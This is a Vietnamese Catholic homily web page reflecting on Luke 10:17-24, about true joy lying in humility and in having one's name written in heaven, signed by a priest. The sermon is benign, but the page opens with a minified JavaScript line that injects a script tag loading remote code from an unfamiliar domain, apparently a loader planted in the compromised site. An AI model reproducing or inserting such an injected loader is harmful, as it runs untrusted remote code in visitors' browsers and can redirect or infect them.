;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NIỀM VUI VÀ HẠNH PHÚC ĐÍCH THỰC – Xitô PS

NIỀM VUI VÀ HẠNH PHÚC ĐÍCH THỰC

SUY NIỆM THỨ 7 TUẦN XXVI

LC 10, 17-24

Sau cuộc thực tập ra khơi với bao thành quả tốt đẹp. Nhóm bảy mươi hai trở về với bao nét mặt đầy phấn khởi hân hoan tươi cười rạng rỡ thân thưa với Chúa: “Thưa Thầy, nghe đến danh Thầy cả ma quỷ cũng phải khuất phục chúng con”. Lập tức Đức Giêsu cảnh bảo các ông: “Thầy thấy Satan như một tia chớp từ trời sa xuống. Đây, Thầy đã ban cho anh em quyền năng đạp trên cả rắn rết, bò cạp và mọi thế lực kẻ thù và quỷ thần đều phải khuất phục anh em”. Đồng thời Ngài chỉ cho các ông niềm vui và hạnh phúc đích thực là:

  1. Không phải nguyên việc được Chúa trao cho quyền năng trên mọi thế lực quỷ thần, mà được ghi tên trên trời (Lc 10, 20).
  2. Thứ đến được Chúa mặc khải về các mầu nhiệm của Thiên Chúa đã giấu kín không cho bậc thông thái khôn ngoan biết (Lc 10, 22).
  3. Sau cùng: mắt được trông thấy, tai được nghe điều mà nhiều ngôn sứ và nhiều vua chúa đã muốn thấy và nghe điều anh em đã thấy và đã nghe mà không được (Lc 10, 23-24).

Đó cũng ba điều chính yếu mà chúng ta cùng suy niệm hôm nay:

  1. Trước hết: Đức Giêsu dạy các môn đệ cũng như tất cả chúng ta phải luôn luôn khiêm tốn, đừng quá tự cao tự đại về mọi thành quả tốt đẹp mỹ mãn mà mình đã thực hiện được. Chính vì thế mà sau khi được các môn đệ báo cáo mọi thành quả trong cuộc ra khơi của các ngài với bầu khí phấn khởi và tự mãn Chúa liền khuyến cáo các ông ngay: “Thầy đã thấy Satan như một tia chớp từ trời sa xuống” (Lc 10, 18). Vì thế, phải luôn luôn nhận ra mọi ân huệ Chúa ban là để phụng sự Chúa và phục vụ tha nhân, như chính Chúa truyền dạy các môn đệ: “Đã được trao ban nhưng không thì cũng phải cho nhưng không”, không mảy may dính bén, nhưng luôn luôn nhận ra tất cả đều là hồng ân, với tâm tình cảm tạ tri ân và quảng đại chia sẻ, phục vụ hết mình. Lại nữa, qua đoạn Tin Mừng hôm nay, Chúa như vừa tâm sự vừa khuyên bảo các môn đệ: “Đây Thầy đã ban cho anh em quyền năng để đạp trên rắn rết, bọ cạp và mọi thế lực kẻ thù mà chẳng có gì làm hại được anh em”. Tuy nhiên, anh em chớ mừng vì quỷ thần phải khuất phục anh em, nhưng hãy mừng vì “Tên anh em đã được ghi trên trời” (Lc 10, 20).
  2. Thứ đến: là được Thiên Chúa Cha mặc khải các mầu nhiệm Thiên Chúa và Nước Trời. Quả thực, đây là niềm vui và hạnh phúc đích thực cho những ai khiêm nhường, bé mọn, tín thác hoàn toàn vào quyền năng và tình thương Chúa! Người đời thường bảo: “ Tôi ngộ ra” hay “giác ngộ” hoặc “khám phá ra” nhưng suy cho cùng, nói cho đúng: “Được Chúa mặc khải cho, tôi mới rõ”. Như Chúa Giêsu khen ông Phêrô có phúc, khi ông tuyên xưng “Ngài là Đấng Kitô, Con Thiên Chúa hằng sống”. Chúa bảo: “không phải phàm nhân mặc khải cho anh điều ấy, nhưng là Cha của Thầy Đấng ngự trên trời” (Mt 16, 17-18). Bởi vậy, qua Tin mừng Luca, Đức Giêsu, được Thánh Thần tác động, hớn hở vui mừng và nói: “Lạy Cha là Chúa Tể Trời Đất, con xin ngợi khen Cha vì Cha đã giấu kín không cho bậc khôn ngoan thông thái biết những điều này, nhưng lại mặc khải cho những người bé mọn” (Lc 10, 11). Đức Giêsu còn nói thêm: “không ai biết Người Con là ai, trừ Chúa Cha, cũng như không ai biết Chúa Cha là ai, trừ Người Con và kẻ mà Người Con muốn mặc khải cho” (Lc 10, 22). Quả là niềm vui và hạnh phúc đích thực!
  3. Sau cùng, niềm vui và hạnh phúc đích thực là: phúc thay mắt anh em đã được thấy, tai anh em đã được nghe điều mà nhiều ngôn sứ và nhiều vua chúa đã muốn thấy và nghe mà không được” (Lc 10, 23-24). Lạy Chúa, xin ban cho chúng con cặp mắt mới, đôi tai bén nhạy mới, với con mắt đức tin và cảm biết bằng trái tim kính mến nồng nàn trong khiêm hạ và bé mọn với tất cả tin yêu phó thác để được Chúa là gia nghiệp, niềm vui và hạnh phúc đích thực của chúng con là được ghi tên trên trời. Amen.

LM PHÊRÔ KHOA-LÊ TRỌNG NGỌC

You May Also Like

Trả lời

X